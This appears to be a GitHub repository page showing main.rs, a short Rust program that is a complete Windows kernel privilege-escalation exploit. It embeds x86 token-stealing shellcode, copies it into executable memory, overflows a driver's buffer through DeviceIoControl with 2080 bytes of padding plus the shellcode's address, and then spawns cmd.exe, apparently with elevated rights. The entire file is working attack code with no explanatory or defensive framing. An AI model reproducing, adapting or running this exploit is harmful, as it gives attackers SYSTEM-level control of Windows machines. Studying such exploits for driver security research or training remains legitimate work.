-
Notifications
You must be signed in to change notification settings - Fork 308
/
main.rs
26 lines (24 loc) · 1.16 KB
/
main.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
extern crate winapi;
use winapi::um::fileapi::CreateFileA;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::ioapiset::DeviceIoControl;
use std::ptr::null_mut;
use std::process::Command;
//Cargo.toml : winapi = {version = "0.3.7", features=["fileapi", "ioapiset", "memoryapi"]}
fn main() {
unsafe {
exploit();
}
Command::new("cmd.exe").status().expect("failed :/");
}
unsafe fn exploit() {
let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00";
let filename = r"\\.\Device\0";
let fd = CreateFileA(filename.as_ptr() as _, 0xC0000000, 0, null_mut(), 0x3, 0, null_mut());
let alloc = VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40) as *mut u8;
alloc.copy_from(shellcode.as_ptr() as *mut u8, shellcode.len());
let mut data = vec![b'A'; 2080];
let bytes = (alloc as usize).to_le_bytes();
data.extend_from_slice(&bytes);
DeviceIoControl(fd, 0x222000, data.as_ptr() as _, data.len() as _, null_mut(), 0, &mut 0, null_mut());
}